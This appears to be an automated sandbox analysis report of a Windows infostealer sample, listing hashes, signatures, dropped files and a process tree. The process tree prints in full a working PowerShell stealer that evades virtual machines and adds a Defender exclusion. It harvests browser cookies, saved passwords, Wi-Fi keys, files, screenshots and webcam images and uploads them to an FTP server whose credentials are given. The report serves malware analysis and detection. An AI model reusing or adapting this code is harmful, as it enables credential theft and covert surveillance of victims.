Analysis

  • max time kernel
    151s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    05/05/2023, 12:09

General

  • Target

    lao.exe

  • Size

    7.2MB

  • MD5

    9e55cd6766fae8a83935817092c82797

  • SHA1

    3e0c8d5b8870c581f95200ef6c3ff8986ddb5cba

  • SHA256

    217b6268e7eb4be59b275d8c0c695a28d747fff6c79098e651eb27f81c44a02f

  • SHA512

    8ca1dc0abed46e49d1da3b7f676e8704d142323d37eb1e3d439ea6dbb4091b6364a43a3e1496d9bc9356345724acdd02a922161c5d433f66afa197df67345dae

  • SSDEEP

    196608:dVDGXVFICteErowCzlxZV3Gu5D4S26/CS3r9Lc3GpbN4s:TOInEro/14S26LKWpas

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    https://evilextractor.com/wp-content/uploads/2022/12/Python39-322.zip
  • exe.dropper
    https://github.com/tedburke/CommandCam/archive/refs/heads/master.zip

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    145.14.151.60
  • Port:
    21
  • Username:
    u655548578
  • Password:
    Supreme81

Signatures

  • Blocklisted process makes network request 19 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\lao.exe
    "C:\Users\Admin\AppData\Local\Temp\lao.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2076
    • C:\Users\Admin\AppData\Local\Temp\lao.exe
      "C:\Users\Admin\AppData\Local\Temp\lao.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "$IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model;$IsVirtual"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3008
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI20762\satan.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:236
        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\satan.exe
          C:\Users\Admin\AppData\Local\Temp\_MEI20762\satan.exe
          4⤵
          • Executes dropped EXE
          PID:4088
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ExecutionPolicy Bypass "$startdate=(Get-Date 2022-11-09).toString(\"yyyy-M-dd\") $enddate=(Get-Date 2024-1-05).toString(\"yyyy-M-dd\") $today=Get-Date -format yyyy-M-dd if($today -ge $startdate -and $today -le $enddate){ $ProgressPreference = \"S\"+\"i\"+\"l\"+\"e\"+\"n\"+\"t\"+\"l\"+\"y\"+\"C\"+\"o\"+\"n\"+\"t\"+\"i\"+\"n\"+\"u\"+\"e\" $new_line= \"A\"+\"d\"+\"d\"+\"-\"+\"M\"+\"p\"+\"P\"+\"r\"+\"e\"+\"f\"+\"e\"+\"r\"+\"e\"+\"n\"+\"c\"+\"e\"+\" -E\"+\"x\"+\"c\"+\"l\"+\"u\"+\"s\"+\"i\"+\"o\"+\"n\"+\"P\"+\"a\"+\"t\"+\"h\";$last_line=\"$pwd\".SubString(0,3);Invoke-Expression \"$new_line $last_line -Force\" $IsVirtual=Get-CimInstance win32_computersystem | select -ExpandProperty Model if ($IsVirtual -eq 'V'+'i'+'r'+'t'+'u'+'a'+'l'+'B'+'o'+'x'){ exit }elseif($IsVirtual -eq 'V'+'M'+'W'+'a'+'r'+'e') { exit }elseif($IsVirtual -eq 'H'+'y'+'p'+'e'+'r'+'-'+'V') { exit }else { cd \"$($env:APPDATA)\" $1=\"1\";$2=\"2\";$3=\"3\";$4=\"4\";$5=\"5\";$6=\"6\";$7=\"7\" $hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation ; $whoami=hostname;mkdir \"Cred\($hey)$whoami\$1-Password-Cookies\";mkdir \"Cred\($hey)$whoami\$7-Files\";mkdir \"Cred\($hey)$whoami\$2-wifi\";mkdir \"Cred\($hey)$whoami\$3-sysinfo\";mkdir \"Cred\($hey)$whoami\$4-mac\";mkdir \"Cred\($hey)$whoami\$5-history\";mkdir \"Cred\($hey)$whoami\$6-PublicIP\" (Invoke-WebRequest -uri \"http://ifconfig.me/ip\").Content | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$6-PublicIP\publicIP.txt\" Get-ComputerInfo | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$3-sysinfo\sys-info.txt\" ipconfig /all | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$4-mac\mac.txt\" $UserName = \"$env:USERNAME\" $Path = \"$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History\" $Regex = \"(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?\" $Value = Get-Content -Path \"$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History\"|Select-String -AllMatches $regex |% 
{($_.Matches).Value} |Sort -Unique | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$5-history\chrome_history.txt\" $UserName = \"$env:USERNAME\" $Path = \"$Env:systemdrive\Users\$UserName\AppData\Local\Microsoft\Edge\User Data\Default\History\" $Regex = \"(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?\" $Value = Get-Content -Path \"$Env:systemdrive\Users\$UserName\AppData\Local\Microsoft\Edge\User Data\Default\History\"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$5-history\edge_history.txt\" (netsh wlan show profiles) | Select-String \"\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)} | Select-String \"Key Content\W+\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File -FilePath \"$env:APPDATA\Cred\($hey)$whoami\$2-wifi\extracted_wifi.txt\" cd \"$env:LOCALAPPDATA\";mkdir Programs;cd Programs;mkdir Python $47EHDME84D4pzzHDEM7z4 = New-Object System.Net.WebClient $47EHDME84D4pzzHDEM7z4.DownloadFile(\"https://evilextractor.com/wp-content/uploads/2022/12/Python39-322.zip\",\"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\" \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /shtml cookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content cookies.html | Select-Object -Skip 5 | Out-File chrome_cookies.html $cookie_p = 'chrome_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_p -Raw) | Set-Content $cookie_p 
Copy-Item -Path \"chrome_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\chrome_cookies.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\mzcv_32.exe /shtml cookies_32-bit.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content cookies_32-bit.html | Select-Object -Skip 4 | Out-File mozilla_cookies_32-bit.html $m_32_cookie_p = 'mozilla_cookies_32-bit.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $m_32_cookie_p -Raw) | Set-Content $m_32_cookie_p Copy-Item -Path \"mozilla_cookies_32-bit.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\mozilla_cookies_32-bit.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\mzcv_64.exe /shtml cookies_64-bit.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content cookies_64-bit.html | Select-Object -Skip 4 | Out-File mozilla_cookies_64-bit.html $m_64_cookie_p = 'mozilla_cookies_64-bit.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $m_64_cookie_p -Raw) | Set-Content $m_64_cookie_p Copy-Item -Path \"mozilla_cookies_64-bit.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\mozilla_cookies_64-bit.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /CookiesFile \"$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Network\Cookies\" /shtml edgcookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content edgcookies.html | Select-Object -Skip 5 | Out-File edge_cookies.html $cookie_edg = 'edge_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_edg -Raw) | Set-Content $cookie_edg Copy-Item -Path \"edge_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\edge_cookies.html\" $mission_find=Get-ChildItem 
\"$env:APPDATA\Opera Software\Opera Stable\" -Filter \"Cookies\" -Recurse | % { $_.FullName } cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\ChromeCookiesView.exe /CookiesFile \"$mission_find\" /shtml oprcookies.html -Erroraction \"silentlycontinue\" Start-Sleep -Seconds 10 Get-Content oprcookies.html | Select-Object -Skip 5 | Out-File opera_cookies.html $cookie_opr = 'opera_cookies.html' '<html><body><p><table border=\"1\" cellpadding=\"5\"><tr bgcolor=\"E0E0E0\">' + (Get-Content $cookie_opr -Raw) | Set-Content $cookie_opr Copy-Item -Path \"opera_cookies.html\" -Recurse -Destination \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\opera_cookies.html\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\python.exe soax.py browsers | Out-File not_browser_passwords.txt Get-Content not_browser_passwords.txt | Select-Object -Skip 14 | Select-Object -SkipLast 4 | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\Browser_passwords.txt\" cd \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\";.\python.exe soax.py mails | Out-File not_mail_passwords.txt Get-Content not_mail_passwords.txt | Select-Object -Skip 14 | Select-Object -SkipLast 4 | Out-File \"$env:APPDATA\Cred\($hey)$whoami\$1-Password-Cookies\Mail_passwords.txt\" cd \"$($env:APPDATA)\";$hey=Get-WinHomeLocation | Select -ExpandProperty HomeLocation;$whoami=hostname;mkdir \"Cred\($hey)$whoami\$7-Files\Desktop\";mkdir \"Cred\($hey)$whoami\$7-Files\Downloads\" Get-Childitem \"$($env:USERPROFILE)\Desktop\\\" -Recurse -Include \"*.jpg\", \"*.png\", \"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$7-Files\Desktop\" -Force Get-Childitem \"$($env:USERPROFILE)\Downloads\\\" -Recurse -Include \"*.jpg\", \"*.png\", 
\"*.jpeg\",\"*.mp4\",\"*.mpeg\",\"*.mp3\",\"*.avi\",\"*.txt\",\"*.rtf\",\"*.xlsx\",\"*.docx\",\"*.pptx\",\"*.pdf\",\"*.rar\",\"*.zip\",\"*.7z\",\"*.csv\",\"*.xml\",\"*.html\" -Force | Copy-Item -Recurse -Destination \"$($env:APPDATA)\Cred\($hey)$whoami\$7-Files\Downloads\" -Force $MH8Y4np7DcMYQVzHE = 'ftp://145.14.151.60/' $HHDME47Ez48zzzpEHn = 'u655548578' $8Ez7EHnMD4p4HnHz7zE = 'Supreme81' $E7DH8E47MHEzM4pEDzED = \"$($env:APPDATA)\Cred\\\" $47EHDME84D4pzzHDEM7z4.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE) $SrcEntries = Get-ChildItem $E7DH8E47MHEzM4pEDzED -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $zz74D4HE4D4EHEEEHEE4MH44 = $E7DH8E47MHEzM4pEDzED -replace '\\','\\' -replace '\:','\:' $pMH4EHpH4H4zDEEE474zMEM = $folder.Fullname -replace $zz74D4HE4D4EHEEEHEE4MH44,$MH8Y4np7DcMYQVzHE $pMH4EHpH4H4zDEEE474zMEM = $pMH4EHpH4H4zDEEE474zMEM -replace '\\', '/' try { $D4EE4DD4HDHz7HzD4EE444zEz = [System.Net.WebRequest]::Create($pMH4EHpH4H4zDEEE474zMEM); $D4EE4DD4HDHz7HzD4EE444zEz.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE); $D4EE4DD4HDHz7HzD4EE444zEz.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $D4EE4DD4HDHz7HzD4EE444zEz.GetResponse(); } catch [Net.WebException] { try { $p4Ep44EzzzHz47HME4EHED = [System.Net.WebRequest]::Create($pMH4EHpH4H4zDEEE474zMEM); $p4Ep44EzzzHz47HME4EHED.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE); $p4Ep44EzzzHz47HME4EHED.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $p4Ep44EzzzHz47HME4EHED.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $E7DH8E47MHEzM4pEDzED -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace 
$SrcFilePath,$MH8Y4np7DcMYQVzHE $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $47EHDME84D4pzzHDEM7z4.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Recurse -Force DEL \"$($env:APPDATA)\Cred\" -Force -Recurse DEL \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322\*\" -Force -Recurse DEL \"$($env:LOCALAPPDATA)\Programs\Python\Python39-322.zip\" -Force -Recurse cd \"$($env:APPDATA)\";mkdir \"Ss\($hey)$whoami\Ss\" $47EHDME84D4pzzHDEM7z4.DownloadFile(\"https://github.com/tedburke/CommandCam/archive/refs/heads/master.zip\",\"$($env:APPDATA)\master.zip\") Add-Type -AssemblyName System.IO.Compression.FileSystem function Unzip { param([string]$zipfile, [string]$outpath) [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath) } Unzip \"$($env:APPDATA)\master.zip\" \"$($env:APPDATA)\log_d_information_889176\" Start-Sleep -Seconds 12 while ($true) { [Reflection.Assembly]::LoadWithPartialName(\"S\"+\"y\"+\"s\"+\"t\"+\"e\"+\"m\"+\".\"+\"D\"+\"r\"+\"a\"+\"w\"+\"i\"+\"n\"+\"g\") function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose() } $count_web = (1+ $count_web).ToString('00') $count_sc = (1+ $count_sc).ToString('00') $bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080) Start-Sleep -Seconds 600 screenshot $bounds \"$($env:APPDATA)\Ss\($hey)$whoami\Ss\screenshot$count_sc.png\" cd \"$($env:APPDATA)\log_d_information_889176\CommandCam-master\";.\CommandCam.exe /delay 50 /filename \"$env:APPDATA\Ss\($hey)$whoami\Ss\webcam$count_web.bmp\" $MH8Y4np7DcMYQVzHE = 'ftp://145.14.151.60/' $HHDME47Ez48zzzpEHn = 'u655548578' $8Ez7EHnMD4p4HnHz7zE = 'Supreme81' $E7DH8E47MHEzM4pEDzED = \"$($env:APPDATA)\Ss\\\" $47EHDME84D4pzzHDEM7z4.Credentials = 
New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE) $SrcEntries = Get-ChildItem $E7DH8E47MHEzM4pEDzED -Recurse $Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer} $SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer} foreach($folder in $Srcfolders) { $zz74D4HE4D4EHEEEHEE4MH44 = $E7DH8E47MHEzM4pEDzED -replace '\\','\\' -replace '\:','\:' $pMH4EHpH4H4zDEEE474zMEM = $folder.Fullname -replace $zz74D4HE4D4EHEEEHEE4MH44,$MH8Y4np7DcMYQVzHE $pMH4EHpH4H4zDEEE474zMEM = $pMH4EHpH4H4zDEEE474zMEM -replace '\\', '/' try { $D4EE4DD4HDHz7HzD4EE444zEz = [System.Net.WebRequest]::Create($pMH4EHpH4H4zDEEE474zMEM); $D4EE4DD4HDHz7HzD4EE444zEz.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE); $D4EE4DD4HDHz7HzD4EE444zEz.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory; $D4EE4DD4HDHz7HzD4EE444zEz.GetResponse(); } catch [Net.WebException] { try { $p4Ep44EzzzHz47HME4EHED = [System.Net.WebRequest]::Create($pMH4EHpH4H4zDEEE474zMEM); $p4Ep44EzzzHz47HME4EHED.Credentials = New-Object System.Net.NetworkCredential($HHDME47Ez48zzzpEHn,$8Ez7EHnMD4p4HnHz7zE); $p4Ep44EzzzHz47HME4EHED.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory; $response = $p4Ep44EzzzHz47HME4EHED.GetResponse(); } catch [Net.WebException] { } } } foreach($entry in $SrcFiles) { $SrcFullname = $entry.fullname $SrcName = $entry.Name $SrcFilePath = $E7DH8E47MHEzM4pEDzED -replace '\\','\\' -replace '\:','\:' $DesFile = $SrcFullname -replace $SrcFilePath,$MH8Y4np7DcMYQVzHE $DesFile = $DesFile -replace '\\', '/' $uri = New-Object System.Uri($DesFile) $47EHDME84D4pzzHDEM7z4.UploadFile($uri, $SrcFullname) } DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse DEL \"$env:APPDATA\Ss\($hey)$whoami\Ss\*\" -Force -Recurse DEL \"$env:APPDATA\master.zip\" -Force -Recurse } } }else{ DEL \"$env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\*\" -Force -Recurse exit } "
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:224
        • C:\Windows\system32\HOSTNAME.EXE
          "C:\Windows\system32\HOSTNAME.EXE"
          4⤵
          PID:1944
        • C:\Windows\system32\ipconfig.exe
          "C:\Windows\system32\ipconfig.exe" /all
          4⤵
          • Gathers network information
          PID:2100
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" wlan show profiles
          4⤵
          PID:4144
        • C:\Windows\system32\HOSTNAME.EXE
          "C:\Windows\system32\HOSTNAME.EXE"
          4⤵
          PID:4800

        Network

        MITRE ATT&CK Enterprise v6

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          3bfc414667e1ebc31e9259fa1db290fa

          SHA1

          9bff989429779efef334e5524a362e7b6ff266cb

          SHA256

          b58f994c644f7b4a831e889630bfd7ca0860aeb1e0920dc0f5d4928585a9dbab

          SHA512

          e6cb000e8f900132f7dc661f943b8e91e945d171157ff3289b91e9d79f70230e363ed65b7ec97f451b376cf4706a14de9a86193e72dcea8fe3aa8c86c6117d13

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          e7ad0f405ecb510e88bbad9f5e706008

          SHA1

          c5c2085ffa6b519b6e150e1d24ed6162f75bd70b

          SHA256

          02102e7d473d23234d9e23f78a7e1805f22bd7eab2d8f815771af013cbe36403

          SHA512

          0871e24bfcd9b81fa174d440b79ce1a54dd117cd9ccd9f749dc24154412505a6516b91278e4686611ac0525c2fe6b6a3e0bd5a87c8511eb4ccf8c67d1069f5ec

        • C:\Users\Admin\AppData\Local\Programs\chrome_cookies.html

          Filesize

          72B

          MD5

          1cac3ebd3356882e4d05fb647291ebea

          SHA1

          77b75832e15ce1c2adc4411e5f12db1b630a0ca8

          SHA256

          facc1403e926c510a6b113493c4dfa677b4298edc5829930337987344dc29ccf

          SHA512

          9ff9fae4f3a7b4c7c034036c342dce9a2ea5c94258846a48466e665e1fe6f80150e7fc829e9f0958ebc3e320a8affc0db39bb048b2741359a506cad587dbad43

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\VCRUNTIME140.dll

          Filesize

          94KB

          MD5

          11d9ac94e8cb17bd23dea89f8e757f18

          SHA1

          d4fb80a512486821ad320c4fd67abcae63005158

          SHA256

          e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

          SHA512

          aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\base_library.zip

          Filesize

          1.0MB

          MD5

          3cca79d74f75954ba6bd1db071cfc385

          SHA1

          a8d2fdc1e310e4ed8eb8b396b298da13d4aa623c

          SHA256

          114aa2f3c6fcef8f877e1b1e36965ff48d5d880c8fce336b3fac652699dda1e6

          SHA512

          27b2f6c9d70b43cfb0a0b3ed139187f6fca9d0fd5a1a37b578506edafd883fd9384a925a5261ca144a8bcb5c43d74232ec9bbb85dc5ff230b5d7b99630cc326a

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\python310.dll

          Filesize

          4.2MB

          MD5

          384349987b60775d6fc3a6d202c3e1bd

          SHA1

          701cb80c55f859ad4a31c53aa744a00d61e467e5

          SHA256

          f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

          SHA512

          6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

        • C:\Users\Admin\AppData\Local\Temp\_MEI20762\satan.exe

          Filesize

          1.5MB

          MD5

          a6a0f7c173094f8dafef996157751ecf

          SHA1

          c0dcae7c4c80be25661d22400466b4ea074fc580

          SHA256

          b055fee85472921575071464a97a79540e489c1c3a14b9bdfbdbab60e17f36e4

          SHA512

          965d43f06d104bf6707513c459f18aaf8b049f4a043643d720b184ed9f1bb6c929309c51c3991d5aaff7b9d87031a7248ee3274896521abe955d0e49f901ac94

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_joqqj3fw.hbb.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/224-185-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

        • memory/224-186-0x000001827ABC0000-0x000001827B366000-memory.dmp

          Filesize

          7.6MB

        • memory/224-196-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

        • memory/224-195-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

        • memory/224-194-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

        • memory/224-182-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

        • memory/224-183-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

        • memory/224-184-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

        • memory/224-193-0x00000182790A0000-0x00000182790B0000-memory.dmp

          Filesize

          64KB

        • memory/224-192-0x000001827A8F0000-0x000001827A902000-memory.dmp

          Filesize

          72KB

        • memory/224-191-0x000001827A4B0000-0x000001827A4BA000-memory.dmp

          Filesize

          40KB

        • memory/3008-166-0x0000016A48580000-0x0000016A485A4000-memory.dmp

          Filesize

          144KB

        • memory/3008-162-0x0000016A2F5A0000-0x0000016A2F5B0000-memory.dmp

          Filesize

          64KB

        • memory/3008-163-0x0000016A2F5A0000-0x0000016A2F5B0000-memory.dmp

          Filesize

          64KB

        • memory/3008-164-0x0000016A2F5A0000-0x0000016A2F5B0000-memory.dmp

          Filesize

          64KB

        • memory/3008-165-0x0000016A48580000-0x0000016A485AA000-memory.dmp

          Filesize

          168KB

        • memory/3008-157-0x0000016A2F760000-0x0000016A2F782000-memory.dmp

          Filesize

          136KB